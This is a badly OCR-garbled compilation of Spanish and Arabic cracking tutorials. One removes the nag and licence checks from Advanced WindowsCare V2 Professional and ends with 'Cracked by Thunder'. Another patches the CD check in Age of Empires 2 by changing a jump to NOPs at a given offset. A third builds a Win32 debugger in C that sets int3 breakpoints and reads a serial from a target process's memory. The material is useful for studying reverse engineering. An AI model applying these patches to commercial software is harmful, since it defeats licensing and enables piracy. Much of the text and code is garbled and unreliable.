Cada vez que pasaba por este CALL me generaba una excepción(la cual controlaba muy 
bien la app, por cierto) y me entraba al programa sin la nag, pero con algunos errores en 
datos e informaciones de la misma, por lo que me decidí arriesgarme a nopearla 


UV EHA, EU 
MOU EBx, DWORD PTR DS: [EAXI 
NOP 
NOP 

El] NOP 

3B95 FSFEFFFI MOU EDx, DWORD PTR SS: [EBP-108] 


Seguimos hasta el final de la rutina y corremos nuevamente la aplicación. Esta vez no 
hubo inconvenientes, no hubo Nags ni malas informaciones de la App, todo estaba bien, 
al no ser por la estética. Bueno, realmente había que hacer algo al respecto, porque no 
podía dejar eso tan chambón. De todas maneras, primera misión....CUMPLIDA...fuera 
la NAG....jeje, además me reconocía el nombre con el que la habíamos registrado 
_anteriormente. Ahora teníamos que eliminar y hacer varios cambios en los recursos de 
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3 Advanced WindowsCare V2 Professional iS 


1 Advanced Restore Center Tools Options 
[ele WindowsCare 2 


Professional 


Y Subscription Service Attention 

4f Computer Twpe Daily Use 

A Network Connection General 

A Auto-Care of 

2 Auto Update of 

Program Status 

Program Version: 2.5.7.941 
Last Scan 
Database Date: 2007-9-17 Update Now 
Signature Number: 41391 


License Information 


Y User Account: Thunder 
«f Expiration Date: 


“oticcom 


Tenemos que deshacernos del texto “Subscription Service” y la imagen de al lado(no 
me gustaba), además de los textos “Attention” y los otros dos que quedaron uno encima 
del otro debajo del nombre de usuario. “Renew Now” y “Validate”. Para ello vamos a 
usar el ResHacker, excelente editor de recursos. Salvamos todos los cambios que 
hicimos en el Olly y abrimos el nuevo ejecutable en el ResHack. 


EN Resource Hacker - C:iClases_CRACKINGWINCAREWwc_green.exe 


+ (Ey Cursor 

(1 Bitmap 

(43 Icon 
(3 Dialog 


+- (3 String Table 
3 RCOData 
(3 Cursor Group 
(43 Icon Group 
(3 Version Info 


(39 24 


) 


Para ahorrar trabajo nos auxiliamos nuevamente n el plugin del Olly “Window Juggler” 
a fijarnos en el Class Name del objeto que contiene todos estos elementos que 
mos cambiar. 
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ind Handle: 0x440752 Copy to Clipboard 


Wind ld: 0x440752 
Class Name: TRzSizePanel 


Captior: 


Nos dice que todos están dentro de un Panel, por lo que voy al D 
busco los elementos del Form1 


DFM Inspector 


Show Forrn 


Form1:TForml 
S Label50:TLabel 


RzSizePanel3:TRzSizePanel 
RzSizePanel2:TRzSizePanel 
RzSizePanell:TRzSizePanel 
PMm1:TPopupMenu 

Timer1:T Timer 


Encuentro tres paneles en el Forml, pero el que contiene mis elementos es el 
RzSizePanel3. Allí buscamos los elementos y le copiamos los nombres para poder 
localizarlos mejor en el ResHack. Después de copiarlos, vamos a buscarlos en el 
ResHack y vamos a realizarles los cambios pertinentes. 

Ahora, los dos labels “Renew Now” y “Validate”, además de “Attention”, “Subscription 
Service” y la imagen de al lado toman sus caption en tiempo de ejecución, por lo que va 
a ser un desperdicio de tiempo borrarles el texto. Aun si renombramos estos recursos o 
los eliminamos, vamos a provocar excepciones en el programa y esto no nos conviene. 
Que hacer entonces?....bueno, vamos a darle una patada a cada uno 2000 kilómetros 
lejos de nosotros...jeje 


object Label63: TLabel 
Top = 380 
Width = 67 
Height = 15 
Visible = False 
Cursor = crHandPoint 


Caption = 'Renev Nov' 


Los ponemos en la propiedad “Left” de cada uno de ellos a “2000”, de esta forma los 
vamos a desaparecer del planeta..digo, de la ventana de la aplicación y de nuestra vista. 
Después de agregarle y cambiarle unos cuantos recursos, además de colorear y...bueno, 
nada, que después de divertirnos un poco con la aplicación (ya era hora de divertirse..no 
creen?) terminamos de jugar con los recursos...y bueno, a mi me quedo algo como esto. 
Como diría un gran maestro y amigo: 


quedo limpio como culo de bebe, jeje.y a mano je 
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[3] Advanced WindowsCare V2 Professional |- ¡0 


í ey Advanced Restore Center Tools Options 
2d WindowsCare 2 


Professional 


4f Computer Type Daily Use 
A Network Connection General 
A, Auto-Care of 

A Auto Update of 


Program Version: 2.5.7.941 
Last Scan 
Database Date: 2007-9-17 Update Now 
Signature Number: 41391 
License Information 


SÁ User Account: Thunder 
«f Expiration Date: Never - Cracked by Thunder 


Vobiscom P Start 5 Close 


POR FINNN!!!...aplicación a full y sin NAGS ni cartelitos rojitos...bueno, al menos con 
solo los que debe tener... ;-D 


--->>>MISSION ENDING... 


Bueno, hasta aquí este tutorial, perdónenme si me extendí mucho, pero realmente la 
aplicación estaba trabajosita y quise que no se quedara nada o casi nada fuera de este 
tute. Discúlpenme los errores que pueda haber tenido, soy un chapucero sin remedio ;-D 
Aunque sus consejos y críticas serán bien recibidos en yuniet02015(Whab.jovenclub.cu, 
deja tus sugerencias allí. Agradecimientos a todos los crackers que se dedican a escribir 
tutos y a compartir lo que saben de este hermoso arte, desde Ratón, Diablo Poeta, 
Guillermo, SACCOPHARYNX, Joe Cracker, Destripador € Marmota, COCO, 
MAKKAKO, Lisa Alquimista, y muchos mas de los que escriben teorías, he leído y 
he aprendido lo que se. Por supuesto, al maestro Ricardo Narvaja, gracias por tu ayuda 
desinteresada y por tu tiempo con este newbie y con todos los que lo necesitan. 
Muchísimas gracias a la web www.crackmes.de y a la gente de http://elhacker.net por 
tener ese espacio de Ingeniería Inversa y por estar dispuestos a ayudar siempre...esos 
muchachos están escapaos...jeje. Un saludo a todos los crackers alrededor del mundo y 
_ajtijpor tu tiempo en leer este tute. Y este es el fin...nos vemos en otro...quizás...quien 


THE TRUTH IS. OUT THERE 


THUNDER 


SEEK IT 


Cracking Age of Empires 2 The Conqueros 


Empieza la magia! 
Hola que tal ahora les presento mi tuto sobre CD-Checks!!! 
Una cosa que queria decir a los chicos de Ensemble estudio (creadores de AOE) es que 
como pueden haber creado un juego tan bueno y con una proteccion igual de crackear 
en cualquier version de AOE y ademas tan pero tan estupida. 


Manos a la obra!!!. 

Como ya saben primero abrimos el programa a crackear (AOE 2) sin el CD puesto para 
ver que nos dice. Pasan los videos, presentaciones, etc y??? Arranco igual, que 
pasara? Nahh traten de jugar y van a ver como les aparece la nag de Insert de CD. 
Buieno una ves identificado nuestro objetivo, nos vamos al W32Dasm y 
desensamblamos. Una ves desensamblado vuscamos la cadena Insert the cd y.... ups 
que paso? No ta? SI pensamos un poquito seguro lo que nos mostro era una imagen 
no una string. Ahhh claro pero y ahora como hago?. 

Bueno ahora biene la explicacion de cómo crackear la mayoria de los programas con 
CD check. 

Bueno los programas, para ver si tienen puesto el CD hacen una llamada al la librería 
KERNEL32 a la api GETDRIVETYPEA asi que si en el W32Dasm apretamos el boton de 
imp fn y buscamos la cadena Kernel32.GetdrivetypeA 

KERNEL32 GetDateFormatá, 


setDrivel ypeá, 


KERNEL32 GetEnvironmentstrings 
KERNEL32 GetEnvironmentStringsw' 


y hacemos doble click vamos a parar a: 


* Reference To: KERNEL32.CetDriveTypeA, Ord: 0000h 
| 


:0041F181 83F805 cmp eax, 00000005 
:0041F18D 740D je 0041F19C 
:0041F18F 5E pop esi 

:0041F190 33C0 xor eax, eax 
:0041F192 5B pop ebx 

:0041F193 81040C020000 add esp, 00000Z0Cc 
:0041F199 C20400 ret 0004 


y si hacemos otro doble click vamos a parar a: 


* Reference To: KERNEL32.CetDriveTypeA, Ord: 0000h 
l 


D05FF336 85C0 test eax, eax 
:DOS5FF338 7404 je 005FF344 
:DOS5FF33A S3F801 cmp eax, 00000001 


OO5FF33D 7405 je 005FF344 


Yo en este caso probe prmero con el primer 2 click y funciono pero siempre tenes que 
hacer mas de un 2 click para ver si hay mas llamadas a esa funcion y ver cual es la 
que anda!!! OK? 


Es importante decir que aca (en el primer 2 click) no se hace la comparacion sino que 
esto es lo que hace que te muestre la nag screen. Para ver donde se hace el checkeo 
del cd tenemos que subir un poco hasta donde dice: 

* Referenced by a (Uj)jnconditional or (Cjonditional Jump at Address: 


y apretar el boton de ir a un lugar del codigo e introducir la direccion 0041F176 (esta 
es la direccion de la referencia de la imagen de arriba) y aterrizamos aca: 


:0041F166 683CD86400 push 0064D83C 
:0041F16B 6400 push 00000000 
:0041F16D ES9EEE0O900 call 004BE010 
:0041F172 SEFO mov esi, eax 
:0041F174 85F6 test esi, esi 


Uhmmm un jne (salta si no es igual)(75 en haxadecimal) debajo de un test? Que 
sospechoso no? 

Uhmmm y que pasaria si vamos al Hex Editor y lo cambiamos a je (salta si es igual) 
(74 en hexadecimal) ? 


Lo que esta haciendo es, esta comparando dos registro, uno que esta por default 
adentro del programa y el otro es uno que se genera dependiendo de si esta el CD o 
no. Un poco mas practico seria que si esta el CD y ESI = 1, el otro ESI va a ser 1 para 
que no salte. 


Test ESI 
Test ESI 


1, ESI 
1, ESI 


1 < como son iguales no salta y sigue. 
O € como no son iguales salta y muestra el error. 


Recuerden no cambiarlo en cualquier parte sino en el OFFSET indicado por el 
W32Dasm. Y ademas no pongan los ceros ni la “h” po que es pa que entienda el 
W32Dasm. 


4 
Line:60750 Pg 579 of 9521 Code Data (2:0041F176 (BOffset 0001F1 76h in File:-empires2.exe 


Congratulations se pasa la proteccion de largo y nosotros contentos. Ojo que si ahora 
lo queremos jugar con cd no se ba a poder por que va a comprobar y va a ver que es 
igual y va a saltar. Para arreglar esto pordemos poner en ves de 740B podemos poner 
9090 que es NOP NOP (NO OPERATION) y no hara nada solo seguira de largo!!! 


AUD 0 


MS AA 


úgusell iiall capella! 


XOR EAX, EAX 
PTR DS: [This Book] 


CALL 


lud lees ad loe aso: ATARE Ice JA Aedo 


PEE 


22 MESA TRIAS TETAS 

22 CreateProcess .1.1 
24 GetStartupinfo 1.2. 
24 ReadProcessMemory  .1.3 
25 WriteProcessMemory .1.4 
26 CloseHandle  .1.5 
26 ZeroMemory .1.6 
27 SetThreadContext  .1.7 
27 GetOpenFileName .1.8 
28 WaitForDebugEvent 1,9 
33 ContinueDebugEvent .1.10 
34 DebugActiveProcess .1.11 
34 2 ala: Ad 

34 kyióass Debug bicloz .2.1 
38 Srlailaa ir. lye lajlons io jsa oa 3 aiJecdi: 
38 ¿dí Sul ¿Cól biás ¿las y) ao Lo vd us nl Dd .3.1 
418: cdo to 0d 3.2. 


lid lees id loe gasz! ATARE Ice JA Aedo 


48 4 Lady 
48 5 gin ca jo 
49 ¿6 lija 
49 Ti 
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85 cd 
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* Thread Context: 
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4 diga abi a e mal 


LOAD DLL_DEBUG_INFO || 


typedefstruct_LOAD_DLL_DEBUG_INFO f 
HANDLE hFile; 

LPVOID IpBase0OfDIl; 

DWORD dwDebuglinfoFileOffset; 

DWORD nDebuglinfoSize; 

LPVOID IplmageName; 

WORDfUnicode; 

) LOAD_DLL_DEBUG_INFO; 


de Aa aaa 
O al E Dd 


vaya ImageBase -2¿ 
Pon 
isa: 

ja 


ue o Unicode . 


UNLOAD _DLL_DEBUG_EVEN || 


typedef struct _UNLOAD_DLL_DEBUG_INFO ( 
LPVOID IpBaseOfDIl; 


140 ; Ar a JN dE ia 
Jia 2 E ZUR Aja y, ad IÓ, 


ESTAY 


) UNLOAD_DLL_DEBUG_INFO; 


E hdd. s A E e 
coy eee ly lado ay ps ¿ya y a Trace ¿yu $0 dao, 


BOOL ContinueDebugEvent ( 


DWORD dwProcessld 


A TIN 


gue Lo, TRUE job gt jas, 


Mio E ld la Jai peo 


K ueby 
CreateProcess 


ld les ad les agz: ATARE Olly 0 do sd lo PLE lodo z 


DWORD dwThreadld 


. hThread: 
vada 
4 tn por o y ¿lo 
DBG_CONTINUE 
Alibris 
DWÓRD dwContinuestatus O DBG_EXCEPTION_NOT_HANDLED 


Epa A 
arc rr leer da 


y ld ut : 


¿la 


¡DI EST 


, 


0085 Attach Jugó 


sr Br Boa “ IE 
o co, oh AO UN) DES os 


. DebugActiveProcess vaz zz S3e 


' ¿gue md Attach esas 3Ó copos Lo, TRUE 0% ¿sado 
BOOL DebugActiveProcess ( 


DWORD dwProcessld 


De 


duce  Debbugers 00 Debugger 


all ly 0d zado Ult 2009 


las leg as yz Ives gasz: ATARE Olly 0 do mE) J ly plz lodo z 


dd 


werorQ ja pudre: 
EG 


E 


Verlrzo ssl ya pias 


OPENFILENAME ofn; 


; (aj 2 0 (ON ya gi ¿de Ja ay ¿mis o del EU y) Lol, Coya ua 
* rs ma AO La 
RtlZeroMemory 2oValgaió goya mos 9970 Í10 03, 
4 A . ; SS 
da 3 yO ya a deal y alV O ¿de ¿jaa 


char FileTarget[256]; 


ZeroMemory (8ofn,sizeof (ofn)); 
ZeroMemory (FileTarget,sizeof (FileTarget)); 


ofn.1lStructSize = sizeof(ofn); 

ofn.lpstrFilter = "Win3210*.exe"; 

ofn.lpstrFile = FileTarget; 

ofn.nMaxFile = 256; 

ofn.Flags = OFN PATHMUSTEXIST | OFN FILEMUSTEXIST; 


A Ea ds y Eg: 


if(GetO0penFileNameA(80ofn)) 
1 


FI ica Mire tr 5 1 Ba ME 


) 


ai A 


all ly 0 zado lll 2009 (Gs) — 


sd lees um les Cagz: ATARE Olly OTE ice z 


” 


, qa Hs : 


rata to beds EIA 
dl) oy Mya ¿rod a Eto CezauatreateProcess . 


QÓ gy du po ¿ode ouacetStartupl nfol ¿ci ¿qu Cde 


39)64,6* 


1? Syrscaya ¿ar ¿odo EgaS E Hara: 


STARTUPINEFO sinfo; 
PROCESS INFORMATION pinfo; 
BOOL Result=FALSE ; 


ZeroMemory(épinfo,sizeof (pinfo)); 
ZeroMemory(ésinfo,sizeof (sinfo)); 


ed hh je “El sResult UE ¿2 aueCreateProcess Lo ¿aya BOOL. 


GetStartupInfo(8£sinfo); 
Result=CreateProcess (FileTarget,0,0,0,0,DEBUG_PROCESS+ 
DEBUG ONLY THIS PROCESS, 0,0,£sinfo,£pinfo); 


Add lcd e road)... 


$ A eh Ae dl 2 
uZueis ¿be aby Qe 


while (Result) 
1 


) 


EA , 


; 0? ¿lia Cd PÓREO 


L- 


CO O 
Qs) CreateProcess !!bajylqióya 


casó a copo do joa WaitForDebugEvent ¿4 532 Li: 


all ly 0 zado lll 2009 


las leg as dy Ives oasz: ATARE WwelelVrs e 


DEBUG EVENT DebugEvent; 


4 ge iio: 
while (Result) 


1 
WaitForDebugEvent ($DebugEvent, INFINITE); 
) 
Py ul ja ¿ro 
q El Y to Eo ¿aia el) ¿ya De ee eS a 3 A qb*| ol 
dwDebugEventCode 
are illa 90 su dgógo y Ya Case Switch sgte ¿do p3ds cia 90. 


de cali QUE SU odia ContinueDebugEvent or 


yá ¿operas EN palo ESA Ja: 


ContinueDebugEvent (DebugEvent .dwProcessld, 
DebugEvent .dwThreadId,DBG_EXCEPTION NOT HANDLED); 


4 A to ñ 
ajanag dy dao faja JU da: 


. DBG_CONTINUE yeó ada) ContinueDebugEvent 3 aora do o róA 


while (Result) 
1 
WaitForDebugEvent (8¿DebugEvent , INFINITE); 
switch (DebugEvent.dwDebugEventCode) 
1 


case CREATE PROCESS DEBUG EVENT: 


break; 


case EXCEPTION DEBUG_EVENT: 
ContinueDebugEvent ( DebugEvent .dwProcessld, 
DebugEvent.dwIhreadld, 
DBG_CONTINUE) ; 


break; 


case CREATE THREAD DEBUG_ EVENT: 


break; 


al ly 0 zado lll 2009 Gn —— 


ld lus aaa Ives ago: ATARE alvedosz 


case EXIT PROCESS DEBUG EVENT: 
Result = FALSE ; 
break; 


) 


Result=ContinueDebugEvent ( DebugEvent .dwProcesslId, 
DebugEvent .dwThreadld, 
DBG_EXCEPTION_NOT_HANDLED) ; 


) 


CloseHandle (pinfo.hProcess); 
CloseHandle (pinfo.hThread) ; 
ExitProcess(0); 


Yako xo q ¿urge ds oir iod yu 


djabstd 01); abajo O q ca y 


A e a: 


A ES O a 
Sin, Ji jnó Ceci a lija jue Debugl.cpp 


A E E 


)2 bno puta yal $2 7 Aga 0 plo, 


3 


o all fa y, ya bli A 


+ (F2)- gh yads 1.2 222 OlIyDbg 


0 od gd 2 2 dia ¿e nd 


lod cas il y LJ o? as 0 40) ¿ya si egúgnósi alta) ds lao ¿ej nta de o 
Br ir . 


al ly 0) Ja Iboga 2009 


las leg as oz Ives oasz: ATARE Olly 0 do ME) J ly plz lodo z 


OXCC (6% int3 dida Op Code «s*z Op Code da e y Aca Eye 9 8 gg od, 
. JOCCh( 


1 ps GZÓ 3 y ámal go y o SÓ y Be OXCC ja Cde á sd e roces MEMBO POS We pS i5yo 
Adi ot | s 


JÓ E ¿l soja delinoen: 


void Set_int3 BP(HANDLE hProcess,void* Address,char *OriginalOP) 
1 
char int3_OP=0xCC; 
ReadProcessMemory (hProcess,Address,Original0P,1,0); 
WriteProcessMemory(hProcess,Address,£int3_0P,1,0); 


bits core ls eta e eReueo: 


)1 hProcess ada gts cala o 


y2 Address: cn* Sstuta y iyabrhde. 


33 OriginalOP : 13 


¿oe ¿ora ode gu y a hy) 


ag dal lgcogs | 


El 


dore cóivalnta doce ecología UI sy S 
Cde Aja ja y a 200, PO ElP ¿e ee sec JU? Code OP zz int3 ci 6 
AJ acid Ed, 


QUES AbddeVóióo  EIP— = 0x004010E5 Alo góa Jóday y 
3900) salgas Joti e aso Jal E 06 jale .EXCEPTION_DEBUG_EVENT 
dal yes Cay ell ¿ja da: 


a o SNA dd to. Ano » 

A EXCEPTION_BREAKPOINT — 34dó4 30 uslrgges tol sz 98. O 

ContextFlags=CONTEXT_FULL — 3*yy*4 GetThreadContext  ¿jyek os pued ji Context 
AS q E 


222) ¿ua Jia, 


all ly vd zado lll 2009 


las leg as dz Ives oasz: ATARE Olly 0 do edly plz 


laca 


ábeads cds doo atar cap sóg  Contexttss EP Aj O 


0X004010E5 bd 347 ets ll ree ¿dde Joya, 


eos Jeaue a ¿ot se jua gia je bágz jeogas 


Ed taya! 
void Remove int3 BP(CONTEXT *cntxt,HANDL 
Address,char Originalo0P) 


E hThread,HANDLE hProcess,void* 


1 
WriteProcessMemory(hProcess, Address, $0riginal0P,1,0); 
entxt->ContextFlags=CONTEXT FULL; 
GetThreadContext (hThread,cntxt); 
ecntxt->Eip--; 
SetThreadContext (hThread,cntxt); 
J 


des dto 


e ¿deu all big Js, de yal 


Larabo yd dint3 alii? dd ¿9 Context du 


EP as rr Br. bo ln 


¿5 ¿Oya alla a jo da jos ja asetThreadConteXt 


eulzoza ay) TAN 


Su 3 E qui Pa Sy 7 al AO od: 


Result=CreateProcess( FileTarget, 
0070, 0% 
DEBUG_PROCESS+ DEBUG_ONLY THIS PROCESS, 
0,0, 
£sinfo, 
g£pinfo); 
Set_int3 BP(pinfo.hProcess, (void *)0x0040101 


E4,£60riginal0P); 


:¿3ó CREATE_PROCESS_DEBUG_EVENT¿2 ¿cats gai) ya cal 93 


switch (DebugEvent . dwDebugEventCode) 
1 


case CREATE PROCESS DEBUG EVENT: 
Set_int3 BP(pinfo.hProcess, (void *)0x0040101 


E4,80riginal0P); 
break; 


all ly Uca llo 2009 


laca 


las leg as yz Ives oasz: ATARE 
cava Las) cell! 1654 | 


Gn cásngo  l ¿ lJopgao faa 


case EXCEPTION _DEBUG_EVENT: 
if (DebugEvent.u.Exception.ExceptionRecord.ExceptionCode==EXCEPTION BREAKPOINT) 
( 
entxt .ContextFlags=CONTEXT FULL; 
GetThreadContext (pinfo.hThread, £cntxt); 
if (cntxt.Eip==0x004010E5) 
1 
MessageBox(0,"We Are on the BP","On BP",MB OK); 
Remove _int3 BP( £$cntxt, 
pinfo.hThread, 
pinfo.hProcess, 
(void *)0x004010E4, 
Original0P); 
) 
) 
ContinueDebugEvent (DebugEvent .dwProcessld, 
DebugEvent .dwThreadld, 
DBG_CONTINUE) ; 
break; 
O A A e a A E 
dé q lOa abrónya Ein DE Z go tuya q y PI no gl qu 
O E AO ; Als E 
qu EóJo 7% ¿aja 30 polla ago AL TO a, 
2 ES . A ¡ poa Sí 
E ¿Na A , ! , e e 8 
¿hp IS 2) Je; ) 


ya de dd da : 
PU Poy a Soo sd E 


d JS 


Ed ¿a 


A LIN 


las leg as yz Ives oasz: ATARE WwelelVs e 


e) 


01 03) yo05- 9 Ól Uy l> 


al nr pal 391 


AT4RE 


5) 830 Ugo eo qué oral 08) Ulysse! pS 


1111111111111 


ue sol, 34 ¿23 OllyDbg : 


E 
. BE BBS05100_ |MOU ESI,victim.00518000 
. £DBE GB90EEFF| LEA EDI,DWORD PTR DS: CESI+FFEE9000] 
. 57? PUSH EDI 
. 83CD FF OR EBP,FEFFFFFF 
.v EB 19 JMP SHORT victim. 00521182 
90 NOP 
90 NOP 
90 NOP 
90 NOP 
90 NOP 
90 NOP 
> 8AB6 MOU AL,BYTE PTR DS:[ESI] 
. 46 INC ESI 


Berea YO: 


MOU ECx,EDI 
PUSH EDI 
DEC ERX 
REPNE_SCAS BYTE PTR ES: [EDI] 
PUSH EBP 


55 
FF96 241F1204 CALL DWORD PTR DS: [ESI+121F24] 
Baca OR EAX, ERAX 


mou Emi PTR DS: [EBX],EAX 


es e sto 0x05212DF0 


FF96 281F1200 CALL DWORD PTR DS: CESI+121F2 
61 POPAD 
E9 7854EEFF 


m to Follow 


all ly 0d cado lll 2009 


ls leg as yz Ives oasz: ATARE walvedoz 


Eg e o :OXD40675CO 


8304 EC ADD ESP,-14 
3300 ZOR EAX, EAX 
8545 FO MOU 


8945 EC mou 
Bs 24674000 MOU ERX 


ES CAD4FFFF 
3300 XZOR EAX, EAX 
PUSH ESP 


55 

638 21684000 USH 

64:FF30 PUSH_DWORD_PTR_FS: CEAXJ 
64:3920 MOU DWORD PTR FS: CEAX], ESP 


Ane ro 


pal CASAS TEEN dol, yt ya estes! 


3) Biz. UPX j A Ív » Josh 


33 as Eg us 


: ¿30 OllyDbg cá: CommandLine +]! 342 MessageBox¿s» lgighyerd; », F92) VÍ * 3 


Command bp MessageBoxA [w] BP address, string -- Break with condition 


A ó A 
33 ds ye 340ZoolOnder 23%: 


BreakPoint-> 


SRECASA 


Text Recuperation 
Message Boxes 


Dialog Boxes 


» 
» 


Files » 3 
Modules and Libraries» MessageBoxIndirectá 
Memory Management  » 

, MessageBoxExw' 
al A MessageBoxIndirectw 
Directories and Paths  » 9 

S MessageBoxw' 
Drives » 
Time » 
Miscellaneous (mags...) » 


VB APIs » 


Custom APIS 


11111111111 god je 
: bs 2090 Le OllyDbg 


aa .) e 3 LES 


all ly yd cado lll 2009 


las leg as yz Ives oasz: ATARE Wwe elVrs e 


Hex _dump 


Disassemb ly G 
SBFF MOV EDI,EDI 


PUSH_EBI 
3BEC MOU EBP,E: 
pes AUL4SErE qa DWORD STR DS: [7E3F14BCJ,0 
chi 13000000 |[MOU EAX, DWORD PTR FS: [18] 


PUSH O 
A+ DWORD _PTR DS: [EAX+24] 


DWORD _PTR DS: [<8:KERNEL32. Inter lockedCompareExchange>] |k 
TEST_EAX,EAX 
v GA JNZ 
C705 20182F7E 4 M0U OWORD PTR DS: [7E3F1B201,1 
5A PUSH M 
FF7S 14 
FF7S 10 
FF75 aC Y 
FF7S 08 
Es 20009000 
Y 


320 gag ¿o EDI, EDIMOV «2 + as 10RETN 32 + ÍY F9 deci 39 oda ¿dol saya 340 
. RETN 10¿s> OllyDbglie 


¿o* sszo00403FFA a as sá Exodus 


ay ¡Pyabisd, 


Re SE LFPU) 


ASCII ”"a16b” 


EIP OD4D2FF4 victim. 004B3FF4 


oe bi allz ATARE OÍ 0160-30. a tab age) iy jes 


Jl yr ió usd ao 01052120F . 
sa de: 0x0403FFA. 
ur etoros a AED. 


E A bro P 
ES 


la E 
30SllyDbg sg JS 


1aJé 


1 0X052120F els cal o jaa daa, a ic Sto 
OXO403FFA yl Coal gos ay pt ju ¿bola taa dopo : 


all ly 0 zado lll 2009 


las leg as yz Ives oasz: ATARE 


case CREATE PROCESS DEBUG EVENT: 


EST EA 


Set_int3 BP(pinfo.hProcess, (void *)0x005212DF,s0riginal0P); 


break; 


case EXCEPTION _DEBUG_EVENT: 


if (DebugEvent.u.Exception.ExceptionRecord. 


ExceptionCode==EXCEPTION BREAKPOINT) 


1 
entxt .ContextFlags=CONTEXT FULL; 
GetThreadContext (pinfo.hThread, £cntxt); 
if(cntxt.Eip == 0x005212DF + 1) 
1 
Remove int3 BP(écntxt, 
_ _ pinfo.hThread, 
pinfo.hProcess, 
(void *)0x005212DF, 
Original0P); 
Set_int3 BP(pinfo.hProcess, (void *)0x00403FF4,£0riginal0P); 
) 
else if(cntxt.Eip == 0x00403FF4 + 1) 
1 
wsprintf (RegInformation,"EAX = $.8XIn" 
"ECX = 3%,8XWn" 
"EDX. = %.8XAn" 
"EBX = $,8XA1n" 
"ESP = $,8xX1n" 
"EBP = $.8Xin" 
"ESI = $%,8Xin" 
"EDI E LEE", 
cntxt.] 
cntxt 
cntxt 
cntxt 
cntxt 
cntxt 
cntxt 
ecntxt 
MessageBox (0,RegInformation,"Registers",MB_OK | MB_ICONINFORMATION); 
ReadProcessMemory (pinfo.hProcess, (void *)cntxt.Edx,Serial,5,0); 
MessageBox (0,Serial,"Your Serial Is :",0); 
Remove int3 BP (  £cntxt, 
_ pinfo.hThread, 
pinfo.hProcess, 
(void *)0x00403FF4, 
Original0P ); 
) 
) 


ContinueDebugEvent (DebugEvent .dwProcessld, 


DebugEvent .dwThreadld, 


DBG_CONTINUE) ; 


break; 


Es DDN ae qóllónd? 


case LOAD DLL DEBUG EVENT: 


a ay ul ao lll 


er ió ie ImageBaseca 156 


gio altos 


las leg as az Ives gasz: ATARE WwelelVrs e 


wsprintf (Somelnfo,"The Program Loads a new Library its ImageBase = 
$.8X" DebugEvent.u.LoadD11.1pBase0fD11); 

MessageBox(0,SomeInfo,"D11 ImageBase",MB_OK); 
break; 


EE or apli: 


case CREATE PROCESS DEBUG_EVENT: 
Set_int3 BP(pinfo.hProcess, (void *)0x005212DF,s£0riginalobp); 
wsprintf (SomeInfo,"Program Loaded :InIlmageBase = %.8XInEP = $.8X", 
DebugEvent .u.CreateProcessInfo.lpBase0f Image, 
DebugEvent .u.CreateProcessInfo.lpStartAddress); 
MessageBox (0,SomeInfo,'"Some Pe Info",MB_OK); 
break; 


eo Loya ¿Lo 36 d ¿oe jiod; 


4 La . bl ¿ 
Que ¿ge ¿ho 3 prác e 


case EXIT PROCESS DEBUG EVENT: 
wsprintf (SomeInfo,"Program Closed , its state = %.8X", 
DebugEvent .u.ExitProcess.dwExitCode) ; 
MessageBox(0,SomeInfo,"State" MB OK); 
Result=FALSE; 


break; 
vóLo euro e Jato JOE y ua ces 
Las cn ao, cl 
Sd Uds RR Attach A do jo ¿el ? 
óigam júya  GetOpenFileNameA 3 CreateProcess aljoor torio Jal 

¿250 3 PID 2» Saco Kernel Detective e yo ella ¿o led jo ro DebugActiveProcess 

A A A a ii alaba 

22) CiProgram FilesiNotepad++inotepad++.exe 704 0x81814020 

ñ C: Program FilesiK-Lite Codec PackiMedia Player Classi... E 1392 0x816E3020 

29 C: Program FilesiMicrosoft OfficelOFFICE111WINWOR... 1928 1392 0x816F4688 

"y C: Program Filesi¡CodeBlocks|codeblocks,exe 2004 1392 0x81640020 


all ly 0 zado lll 2009 


las leg as az Ives oasz: ATARE 


DebugActiveProcess((DWORD)1576) ; 


TENES 


A INS 


Olly 0 do "E J ly La EST EA 


: 64 DebugActiveProcess yaiáy 0% y Esa 


a pen Sa ¿o 


las leg as az Ives oasz: ATARE Olly gio sd | yo LE doce. e 


Ll OD 


Secriptins In OLLYDEC : CdbsScript 


SIE 


, 


Ldoo 


dederraldesd  OdbgScriptlyr: 


raya lao ye 97000 yl gg eS 


dde red 3 ua Cobida OdbgScript ñ GE d (e DA Se 


sóla ¿00 gorra giecioó 


derria do; ¿adds y 


állgiója iótya gia qe yo de q adi al 


5lelelcuo dell 


do gósiya st alo ja ¿ua q ¿pla joa: 
ió OdhgScript z, qá ¿o ¿Sa Je so ¿e Oya sa, 
rg ropa ¿oz ae dad jy bj joya, 
20 ea ao: HH4 ADOF.) 
dla cdta ge Saga (as HO) 
dé Dady yya OdbgScript “op *¿oak* ala ccioo ya: +-*/8 <> de: 


SEÍE aa sd ja de jasa) 


00000 


ANDplas Ki 
OR ptas | 
XOR ales n 
SHRpÓlas > 
SHL alas < 


ll já ja ¿ali jo e O gp do a diaal yl: 


SRESULT 226 gerard air 


a ly 00 ¿Ja llo pat 2009 


gala goma luego: ATÁRE Olly 90d Ivo aba leeciugloedunge 


SRESULT 13dqyoábidt yan tallado, O 
SRESULT 23fajaslc* yan jtáljigo, O 
¿OdbgScript¿ ón qué -Óla VERSIONS O 


TA PST O) 


OdbgScript 1 .8 


¿ore tr alli o ea: 


INSTRUCTION paraml, param2 [param3] 


des. 
¿qa yy yapa >  INSTRUCTION 
SA9Ó al pa > paraml 
abad só) > param2 


Late stgo > params 


all ly 00 ¿Ja Iboga 2009 


lil lug as om los age: ATARE Olly Ivi d iy plz clase 


Lblasreló destouiadilijddest Pas d 
add x, "times" cad 
mov x, 100 
add ecx, Xx 
add [401000], 200 
¡AL 
AL (a 2 
"Animate into" zóJI oz | Pas d 
:ALLOC 
ALLOC size la 2 
¿aaa Gi jo size digo, 02109 áca ye d RESULTS Ves d 
:AN 
AN add (ja 2 
ES (íJ:3 )Analyze: 
an eip 
:AO 
AO | ía e 
"Animate Over" óJIoz "eg d 
¡ASK 
ASK question La e 
34d 00d ro li . Pes y 
m0 A 
CA d 
ixssodlo e diós,30 ) SRESULT 1 
mov eip, SRESULT did 
"ask "Enter new ElP 
cmp SRESULT, O 
je cancel_pressed 
mov eip, SRESULT 
cancel_pressed: 
ret 
:ASM 
ASM addr, command yaa 


asm 4012FE, "xor eax,eax" 


asm 4012FE, "mycode.asm" dao 


:ATOI 


La d 


all ly 0 zado lll 2009 


Lili as amd SUE: ATARE Olly 0 sdlyi AS 


BC [addr] (5 e 
o erro io rc iolcoladdr Pas d 
bc 6A0000 1/ cid 
bc eip 1/ 


BEGINS 
BEGINSEARCH [start] 2 ¡EARCH 


olstartidó | os y 


mov count, O ; ¿3d 
mov start, eip 
beginsearch start 
